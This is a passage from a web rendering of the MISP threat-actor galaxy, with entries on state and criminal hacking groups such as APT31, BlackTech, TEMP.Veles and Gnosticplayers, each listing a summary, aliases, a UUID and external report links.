- https://www.justice.gov/opa/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic-revolutionary - webarchive
- https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again - webarchive
- https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities - webarchive
- https://www.proofpoint.com/us/threat-insight/post/seems-phishy-back-school-lures-target-university-students-and-staff - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-dickens - webarchive
- https://community.riskiq.com/article/44eb0802 - webarchive
- https://www.proofpoint.com/us/corporate-blog/post/iranian-state-sponsored-and-aligned-attacks-what-you-need-know-and-steps-protect - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
APT31
FireEye characterizes APT31 as an actor specialized in intellectual property theft, focusing on data and projects that make a particular organization competitive in its field. Based on available data (April 2016), FireEye assesses that APT31 conducts network operations at the behest of the Chinese government. According to CrowdStrike, this adversary is also suspected of continuing to target upstream providers (e.g., law firms and managed service providers) to support additional intrusions against high-profile assets. In 2018, CrowdStrike observed this adversary using spear-phishing, URL “web bugs” and scheduled tasks to automate credential harvesting.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT31.
Known Synonyms |
---|
BRONZE VINEWOOD |
JUDGMENT PANDA |
Red keres |
TA412 |
Violet Typhoon |
ZIRCONIUM |
Zirconium |
Internal MISP references
UUID 6bf7e6b6-5917-45a6-9567-f0baba79768c
which can be used as unique global reference for APT31
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/ - webarchive
- https://duo.com/decipher/apt-groups-moving-down-the-supply-chain - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf - webarchive
- https://redalert.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists - webarchive
- https://twitter.com/bkMSFT/status/1201876664667582466 - webarchive
- https://www.secureworks.com/research/bronz-vinewood-uses-hanaloader-to-target-government-supply-chain - webarchive
- https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-vinewood - webarchive
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://research.checkpoint.com/2021/the-story-of-jian - webarchive
- https://supo.fi/-/suojelupoliisi-tunnisti-eduskuntaan-kohdistuneen-kybervakoiluoperaation-apt31-ksi - webarchive
- https://poliisi.fi/-/eduskunnan-tietojarjestelmiin-kohdistuneen-tietomurron-tutkinnassa-selvitetaan-yhteytta-apt31-toimijaan - webarchive
- https://pst.no/alle-artikler/pressemeldinger/etterforskningen-av-datanettverksoperasjonen-mot-fylkesmannsembetene-er-avsluttet - webarchive
- https://www.nrk.no/norge/pst_-har-etterretning-om-at-kinesisk-gruppe-stod-bak-dataangrep-mot-statsforvaltere-1.15540601 - webarchive
- https://www.ncsc.gov.uk/news/uk-allies-hold-chinese-state-responsible-for-pervasive-pattern-of-hacking - webarchive
- https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking - webarchive
- https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china - webarchive
- https://www.consilium.europa.eu/en/press/press-releases/2021/07/19/declaration-by-the-high-representative-on-behalf-of-the-eu-urging-china-to-take-action-against-malicious-cyber-activities-undertaken-from-its-territory/ - webarchive
- https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003 - webarchive
- https://twitter.com/bkMSFT/status/1417823714922610689 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists - webarchive
- https://www.fortinet.com/blog/psirt-blogs/importance-of-patching-an-analysis-of-the-exploitation-of-n-day-vulnerabilities - webarchive
- https://intrusiontruth.wordpress.com/2023/05/11/article-1-whats-cracking-at-the-kerui-cracking-academy - webarchive
- https://intrusiontruth.wordpress.com/2023/05/12/the-illustrious-graduates-of-wuhan-kerui - webarchive
- https://intrusiontruth.wordpress.com/2023/05/13/all-roads-lead-back-to-wuhan-xiaoruizhi-science-and-technology-company - webarchive
- https://intrusiontruth.wordpress.com/2023/05/15/trouble-in-paradise - webarchive
- https://intrusiontruth.wordpress.com/2023/05/16/introducing-cheng-feng - webarchive
- https://intrusiontruth.wordpress.com/2023/05/17/missing-links - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Common-TTPs-of-attacks-against-industrial-organizations-implants-for-remote-access-En.pdf - webarchive
- https://asec.ahnlab.com/ko/55070 - webarchive
- https://intrusiontruth.wordpress.com/2023/07/04/wuhan-xiaoruizhi-class-of-19 - webarchive
- https://intrusiontruth.wordpress.com/2023/07/07/one-man-and-his-lasers - webarchive
- https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2023-02-bfv-cyber-brief.pdf?__blob=publicationFile&v=6 - webarchive
- https://www.justice.gov/opa/pr/seven-hackers-associated-chinese-government-charged-computer-intrusions-targeting-perceived - webarchive
- https://www.justice.gov/opa/media/1345141/dl?inline - webarchive
- https://www.gov.uk/government/news/uk-holds-china-state-affiliated-organisations-and-individuals-responsible-for-malicious-cyber-activity - webarchive
- https://harfanglab.io/en/insidethelab/apt31-indictment-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Blackgear
BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts. Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users. Two things led us to this conclusion: first, the fake documents that are used as part of its infection routines are now in Japanese. Secondly, it is now using blogging sites and microblogging services based in Japan for its C&C activity.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Blackgear.
Known Synonyms |
---|
BLACKGEAR |
Comnie |
Topgear |
Internal MISP references
UUID 8b62b20a-5b1c-48af-8424-e8220cd2fbd7
which can be used as unique global reference for Blackgear
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
BlackOasis
BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. A group known by Microsoft as NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackOasis.
Known Synonyms |
---|
G0063 |
Internal MISP references
UUID 8fbd195f-5e03-4e85-8ca5-4f1dff300bec
which can be used as unique global reference for BlackOasis
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BlackTech
BlackTech is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally Japan and Hong Kong. Based on the mutexes and domain names of some of their C&C servers, BlackTech’s campaigns are likely designed to steal their targets’ technology. Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns: PLEAD, Shrouded Crossbow, and of late, Waterbear. PLEAD is an information theft campaign with a penchant for confidential documents. Active since 2012, it has so far targeted Taiwanese government agencies and private organizations. PLEAD’s toolset includes the self-named PLEAD backdoor and the DRIGO exfiltration tool. PLEAD uses spear-phishing emails to deliver and install its backdoor, either as an attachment or through links to cloud storage services. Some of the cloud storage accounts used to deliver PLEAD are also used as drop-off points for documents exfiltrated by DRIGO. PLEAD actors use a router scanner tool to scan for vulnerable routers, after which the attackers enable the router’s VPN feature and register a machine as a virtual server. This virtual server is then used either as a C&C server or as an HTTP server that delivers PLEAD malware to their targets.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackTech.
Known Synonyms |
---|
CIRCUIT PANDA |
Earth Hundun |
G0098 |
HUAPI |
Manga Taurus |
Palmerworm |
Red Djinn |
T-APT-03 |
Temp.Overboard |
Internal MISP references
UUID 320c42f7-eab7-4ef9-b09a-74396caa6c3e
which can be used as unique global reference for BlackTech
in MISP communities and other software using the MISP galaxy
External references
- https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/ - webarchive
- https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/ - webarchive
- https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt - webarchive
- https://unit42.paloaltonetworks.com/atoms/mangataurus/ - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.trendmicro.com/en_us/research/24/d/earth-hundun-waterbear-deuterbear.html - webarchive
- https://blogs.jpcert.or.jp/en/2022/03/jsac2022report1.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
FIN5
FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN5.
Known Synonyms |
---|
G0053 |
Internal MISP references
UUID 44dc2f9c-8c28-11e9-9b9a-7fdced8cbf70
which can be used as unique global reference for FIN5
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
FIN1
FireEye first identified this activity during a recent investigation at an organization in the financial industry. They identified the presence of a financially motivated threat group that they track as FIN1, whose activity at the organization dated back several years. The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as ‘Nemesis’ by the malware developer(s), and used this malware to access the victim environment and steal cardholder data. FIN1, which may be located in Russia or a Russian-speaking country based on language settings in many of their custom tools, is known for stealing data that is easily monetized from financial services organizations such as banks, credit unions, ATM operations, and financial transaction processing and financial business services companies.
Internal MISP references
UUID 13289552-596e-4592-9c81-eeb4db6baf3c
which can be used as unique global reference for FIN1
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
FIN10
FireEye has observed multiple targeted intrusions occurring in North America — predominantly in Canada — dating back to at least 2013 and continuing through at least 2016, in which the attacker(s) have compromised organizations’ networks and sought to monetize this illicit access by exfiltrating sensitive data and extorting victim organizations. In some cases, when the extortion demand was not met, the attacker(s) destroyed production Windows systems by deleting critical operating system files and then shutting down the impacted systems. Based on near-parallel TTPs used by the attacker(s) across these targeted intrusions, we believe these clusters of activity are linked to a single, previously unobserved actor or group that we have dubbed FIN10.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN10.
Known Synonyms |
---|
G0051 |
Internal MISP references
UUID f2d02410-8c2c-11e9-8df1-a31c1fb33d79
which can be used as unique global reference for FIN10
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GhostNet
Cyber espionage is an issue whose time has come. In this second report from the Information Warfare Monitor, we lay out the findings of a 10-month investigation of alleged Chinese cyber spying against Tibetan institutions. The investigation, consisting of fieldwork, technical scouting, and laboratory analysis, discovered a lot more. The investigation ultimately uncovered a network of over 1,295 infected hosts in 103 countries. Up to 30% of the infected hosts are considered high-value targets and include computers located at ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The Tibetan computer systems we manually investigated, and from which our investigations began, were conclusively compromised by multiple infections that gave attackers unprecedented access to potentially sensitive information. Attacks on the Dalai Lama’s Private Office: the OHHDL started to suspect it was under surveillance while setting up meetings between His Holiness and foreign dignitaries. They sent an email invitation on behalf of His Holiness to a foreign diplomat, but before they could follow it up with a courtesy telephone call, the diplomat’s office was contacted by the Chinese government and warned not to go ahead with the meeting. The Tibetans wondered whether a computer compromise might be the explanation; they called ONI Asia, who called us. (Until May 2008, the first author was employed on a studentship funded by the OpenNet Initiative and the second author was a principal investigator for ONI.)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GhostNet.
Known Synonyms |
---|
Snooping Dragon |
Internal MISP references
UUID cacf2ffc-8c49-11e9-895e-7f5bf9c2ff6d
which can be used as unique global reference for GhostNet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GozNym
IBM X-Force Research uncovered a Trojan hybrid spawned from the Nymaim and Gozi ISFB malware. It appears that the operators of Nymaim have recompiled its source code with part of the Gozi ISFB source code, creating a combination that is being actively used in attacks against more than 24 U.S. and Canadian banks, stealing millions of dollars so far. X-Force named this new hybrid GozNym. The new GozNym hybrid takes the best of both the Nymaim and Gozi ISFB malware to create a powerful Trojan. From the Nymaim malware, it leverages the dropper’s stealth and persistence; the Gozi ISFB parts add the banking Trojan’s capabilities to facilitate fraud via infected Internet browsers. The end result is a new banking Trojan in the wild.
Internal MISP references
UUID 7803b380-8c4c-11e9-90a1-f3880ab3aaa0
which can be used as unique global reference for GozNym
in MISP communities and other software using the MISP galaxy
External references
- https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/ - webarchive
- https://threatpost.com/attackers-behind-goznym-trojan-set-sights-on-europe/117647/ - webarchive
- https://threatpost.com/goznym-banking-trojan-targeting-german-banks/120075/ - webarchive
- https://www.europol.europa.eu/newsroom/news/goznym-malware-cybercriminal-network-dismantled-in-international-operation - webarchive
Associated metadata
Metadata key | Value |
---|---|
Group5
A threat actor using Iranian-language tools and Iranian hosting companies, and at times operating from Iranian IP space, was observed targeting the Syrian opposition in an elaborately staged malware operation, Citizen Lab researchers reveal. The operation was first noticed in late 2015, when a member of the Syrian opposition flagged a suspicious email containing a PowerPoint slideshow, which led researchers to a watering hole website with malicious programs, malicious PowerPoint files, and Android malware. The threat actor was targeting Windows and Android devices of well-connected individuals in the Syrian opposition, researchers discovered. They called the actor Group5, because it targets the Syrian opposition after regime-linked malware groups, the Syrian Electronic Army, ISIS (also known as the Islamic State or ISIL), and a group linked to Lebanon did the same in the past.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Group5.
Known Synonyms |
---|
G0043 |
Internal MISP references
UUID bc8390aa-8c4e-11e9-a9cb-e37c361210af
which can be used as unique global reference for Group5
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Honeybee
McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks. Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them. The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Honeybee.
Known Synonyms |
---|
G0072 |
Internal MISP references
UUID 2d82a18e-8c53-11e9-b0ec-536b62fa3d86
which can be used as unique global reference for Honeybee
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Lucky Cat
A series of attacks, targeting both Indian military research and south Asian shipping organizations, demonstrate the minimum level of effort required to successfully compromise a target and steal sensitive information. The attackers use very simple malware, which required little development time or skills, in conjunction with freely available Web hosting, to implement a highly effective attack. It is a case of the attackers obtaining a maximum return on their investment. The attack shows how an intelligent attacker does not need to be particularly technically skilled in order to steal the information they are after. The attack begins, as is often the case, with an email sent to the victim. A malicious document is attached to the email, which, when loaded, activates the malware. The attackers use tailored emails to encourage the victim to open the email. For example, one email sent to an academic claimed to be a call for papers (CFP) for a conference. The vast majority of the victims were based in India, with some in Malaysia. The victim industry was mostly military research and also shipping based in the Arabian and South China seas. In some instances the attackers appeared to have a clear goal, whereby specific files were retrieved from certain compromised computers. In other cases, the attackers used more of a ‘shotgun’-like approach, copying every file from a computer. Military technologies were obviously the focus of one particular attack, with what appeared to be source code stolen. 45 different attacker IP addresses were observed. Out of those, 43 were within the same IP address range based in Sichuan province, China. The remaining two were based in South Korea. The pattern of attacker connections implies that the IP addresses are being used as a VPN, probably in an attempt to render the attackers anonymous. The attacks have been active from at least April 2011 up to February 2012.
The attackers are intelligent and focused, employing the minimum amount of work necessary for the maximum gain. They do not use zero day exploits or complicated threats, instead they rely on effective social engineering and lax security measures on the part of the victims.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lucky Cat.
Known Synonyms |
---|
TA413 |
White Dev 9 |
Internal MISP references
UUID e502802e-8d0a-11e9-bd72-9f046529b3fd
which can be used as unique global reference for Lucky Cat
in MISP communities and other software using the MISP galaxy
External references
- https://vx-underground.org/papers/luckycat-hackers-12-en.pdf - webarchive
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic - webarchive
Associated metadata
Metadata key | Value |
---|---|
RTM
There are several groups actively and profitably targeting businesses in Russia. A trend that we have seen unfold before our eyes lately is these cybercriminals’ use of simple backdoors to gain a foothold in their targets’ networks. Once they have this access, a lot of the work is done manually, slowly getting to understand the network layout and deploying custom tools the criminals can use to steal funds from these entities. Some of the groups that best exemplify these trends are Buhtrap, Cobalt and Corkow. The group discussed in this white paper is part of this new trend. We call this new group RTM; it uses custom malware, written in Delphi, that we cover in detail in later sections. The first trace of this tool in our telemetry data dates back to late 2015. The group also makes use of several different modules that they deploy where appropriate to their targets. They are interested in users of remote banking systems (RBS), mainly in Russia and neighboring countries.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RTM.
Known Synonyms |
---|
G0048 |
Internal MISP references
UUID 88100602-8e8b-11e9-bb7c-1bf20b58e305
which can be used as unique global reference for RTM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Shadow Network
Shadows in the Cloud documents a complex ecosystem of cyber espionage that systematically compromised government, business, academic, and other computer network systems in India, the Offices of the Dalai Lama, the United Nations, and several other countries. The report also contains an analysis of data which were stolen from politically sensitive targets and recovered during the course of the investigation. These include documents from the Offices of the Dalai Lama and agencies of the Indian national security establishment. Data containing sensitive information on citizens of numerous third-party countries, as well as personal, financial, and business information, were also exfiltrated and recovered during the course of the investigation. The report analyzes the malware ecosystem employed by the Shadows’ attackers, which leveraged multiple redundant cloud computing systems, social networking platforms, and free web hosting services in order to maintain persistent control while operating core servers located in the People’s Republic of China (PRC). Although the identity and motivation of the attackers remain unknown, the report is able to determine the location (Chengdu, PRC) as well as some of the associations of the attackers through circumstantial evidence. The investigation is the product of an eight month, collaborative activity between the Information Warfare Monitor (Citizen Lab and SecDev) and the Shadowserver Foundation. The investigation employed a fusion methodology, combining technical interrogation techniques, data analysis, and field research, to track and uncover the Shadow cyber espionage network.
Internal MISP references
UUID ef800f1c-8e90-11e9-972c-53e01614f101
which can be used as unique global reference for Shadow Network
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Slingshot
While analysing an incident which involved a suspected keylogger, we identified a malicious library able to interact with a virtual file system, which is usually the sign of an advanced APT actor. This turned out to be a malicious loader internally named ‘Slingshot’, part of a new and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity. While for most victims the infection vector for Slingshot remains unknown, we were able to find several cases where the attackers got access to MikroTik routers and placed a component downloaded by Winbox Loader, a management suite for MikroTik routers. In turn, this infected the administrator of the router. We believe this cluster of activity started in at least 2012 and was still active at the time of this analysis (February 2018).
Internal MISP references
UUID 4fcbd08a-8ea6-11e9-8bf2-970182ab6bb5
which can be used as unique global reference for Slingshot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Taidoor
The Taidoor attackers have been actively engaging in targeted attacks since at least March 4, 2009. Despite some exceptions, the Taidoor campaign often used Taiwanese IP addresses as C&C servers and Taiwanese email addresses to send out socially engineered emails with malware as attachments. One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government. The attackers spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues. The attackers actively sent out malicious documents and maintained several IP addresses for command and control. As part of their social engineering ploy, the Taidoor attackers attach a decoy document to their emails that, when opened, displays the contents of a legitimate document but executes a malicious payload in the background. We were only able to gather a limited amount of information regarding the Taidoor attackers’ activities after they have compromised a target. We did, however, find that the Taidoor malware allowed attackers to operate an interactive shell on compromised computers and to upload and download files. In order to determine the operational capabilities of the attackers behind the Taidoor campaign, we monitored a compromised honeypot. The attackers issued some basic commands in an attempt to map out the extent of the network compromise but quickly realized that the honeypot was not an intended target and so promptly disabled the Taidoor malware running on it. This indicated that while Taidoor malware was more widely distributed compared with malware tied to other targeted campaigns, the attackers could quickly assess their targets and distinguish these from inadvertently compromised computers and honeypots.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Taidoor.
Known Synonyms |
---|
Earth Aughisky |
G0015 |
Internal MISP references
UUID e6669606-91ad-11e9-b6f5-374843911989
which can be used as unique global reference for Taidoor
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf - webarchive
- https://attack.mitre.org/groups/G0015/ - webarchive
- https://www.trendmicro.com/en_us/research/22/j/tracking-earth-aughiskys-malware-and-changes.html - webarchive
- https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat - webarchive
Associated metadata
Metadata key | Value |
---|---|
TEMP.Veles
TEMP.Veles is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TEMP.Veles.
Known Synonyms |
---|
ATK91 |
G0088 |
Xenotime |
Internal MISP references
UUID 90abfc42-91c6-11e9-89b1-af58de8f7ec2
which can be used as unique global reference for TEMP.Veles
in MISP communities and other software using the MISP galaxy
External references
- https://dragos.com/resource/trisis-analyzing-safety-system-targeting-malware/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html - webarchive
- https://attack.mitre.org/groups/G0088/ - webarchive
- https://cyberthreat.thalesgroup.com/attackers/ATK91 - webarchive
- https://www.dragos.com/threat/xenotime/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
capabilities | TRISIS, custom credential harvesting |
mode-of-operation | Focused on physical destruction and long-term persistence |
since | 2014 |
victimology | Oil and Gas, Middle East |
WindShift
In August of 2018, DarkMatter released a report entitled “In the Trails of WINDSHIFT APT”, which unveiled a threat actor with TTPs very similar to those of Bahamut. Subsequently, two additional articles were released by Objective-See which provide an analysis of some validated WINDSHIFT samples targeting OSX systems. Pivoting on specific file attributes and infrastructure indicators, Unit 42 was able to identify and correlate additional attacker activity and can now provide specific details on a targeted WINDSHIFT attack as it unfolded at a Middle Eastern government agency.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WindShift.
Known Synonyms |
---|
Windy Phoenix |
Internal MISP references
UUID cbbbfc82-9294-11e9-8e19-2bc14137b25b
which can be used as unique global reference for WindShift
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/shifting-in-the-wind-windshift-attacks-target-middle-eastern-governments/ - webarchive
- https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/windyphoenix/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
[Unnamed group]
Over the last few weeks, several significant leaks regarding a number of Iranian APTs took place. After analyzing and investigating the documents, we conclude that they are authentic. Consequently, this causes considerable harm to the groups and their operations. The identity of the actor behind the leak is currently unknown; however, based on the scope and the quality of the exposed documents and information, it appears that they are professional and highly capable. This leak will likely hamstring the groups' operations in the near future. Accordingly, in our assessment this will minimize the risk of potential attacks in the next few months and possibly even a year. Note: most of the leaks are posted on Telegram channels that were created specifically for this purpose. Below are the three main Telegram groups on which the leaks were posted:
- Lab Dookhtegam (a pseudonym; "The people whose lips are stitched and sealed", translated from Persian): in this channel, attack tools attributed to the group 'OilRig' were leaked, including a webshell that was inserted into the Technion, various tools that were used for DNS attacks, and more.
- Green Leakers: in this channel, attack tools attributed to the group 'MuddyWater' were leaked. The group's name and its symbol are identified with the "Green Movement", which led the protests in Iran after the presidential elections in 2009. These protests were heavily repressed by the Revolutionary Guards (IRGC).
- Black Box: unlike the previous two channels, this one has been around for a long time. On Friday May 5th, dozens of confidential documents labeled as "secret" (a high confidentiality level in Iran, one level below the highest, top secret) were posted on this channel. The documents were related to Iranian attack groups' activity.
Internal MISP references
UUID f50a5f64-9296-11e9-9b46-a331d01a008d
which can be used as unique global reference for [Unnamed group]
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DUNGEON SPIDER
DUNGEON SPIDER is a criminal group operating the ransomware most commonly known as Locky, which has been active since February 2016 and was last observed in late 2017. Locky is a ransomware tool that encrypts files using a combination of cryptographic algorithms: RSA with a key size of 2,048 bits, and AES with a key size of 128 bits. Locky targets a large number of file extensions and is able to encrypt data on shared network drives. In an attempt to further impact victims and prevent file recovery, Locky deletes all of the Shadow Volume Copies on the machine. DUNGEON SPIDER primarily relies on broad spam campaigns with malicious attachments for distribution. Locky is the community/industry name associated with this actor.
Internal MISP references
UUID f1da463c-9297-11e9-875a-d327fc8282f2
which can be used as unique global reference for DUNGEON SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Fxmsp
Throughout 2017 and 2018, Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground. Some of the known Fxmsp TTPs included accessing network environments via externally available remote desktop protocol (RDP) servers and exposed Active Directory. Most recently, the actor claimed to have developed a credential-stealing botnet capable of infecting high-profile targets in order to exfiltrate sensitive usernames and passwords. Fxmsp has claimed that developing this botnet and improving its capabilities for stealing information from secured systems is their main goal.
Internal MISP references
UUID 686f4fe0-9298-11e9-b02a-af9595918956
which can be used as unique global reference for Fxmsp
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Gnosticplayers
The hacker said that he put up the data for sale mainly because these companies had failed to protect passwords with strong password hashing algorithms like bcrypt. Most of the hashed passwords the hacker put up for sale today can be cracked with varying levels of difficulty, but they can be cracked. "I got upset because I feel no one is learning," the hacker told ZDNet in an online chat earlier today. "I just felt upset at this particular moment, because seeing this lack of security in 2019 is making me angry." In a conversation with ZDNet last month, the hacker told us he wanted to hack and put up for sale more than one billion records and then retire and disappear with the money. But in a conversation today, the hacker says this is not his target anymore, as he learned that other hackers have already achieved the same goal before him. Gnosticplayers also revealed that not all the data he obtained from hacked companies had been put up for sale. Some companies gave in to extortion demands and paid fees so breaches would remain private. "I came to an agreement with some companies, but the concerned startups won't see their data for sale," he said. "I did it, that's why I can't publish the rest of my databases or even name them."
Internal MISP references
UUID f32e3682-9298-11e9-8dcb-639156d97cd1
which can be used as unique global reference for Gnosticplayers
in MISP communities and other software using the MISP galaxy
External references
- https://www.zdnet.com/article/round-4-hacker-returns-and-puts-26mil-user-records-for-sale-on-the-dark-web/ - webarchive
- https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/ - webarchive
- https://www.zdnet.com/article/127-million-user-records-from-8-companies-put-up-for-sale-on-the-dark-web/ - webarchive
- https://www.zdnet.com/article/hacker-puts-up-for-sale-third-round-of-hacked-databases-on-the-dark-web/ - webarchive
- https://www.zdnet.com/article/a-hacker-has-dumped-nearly-one-billion-user-records-over-the-past-two-months/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Hacking Team
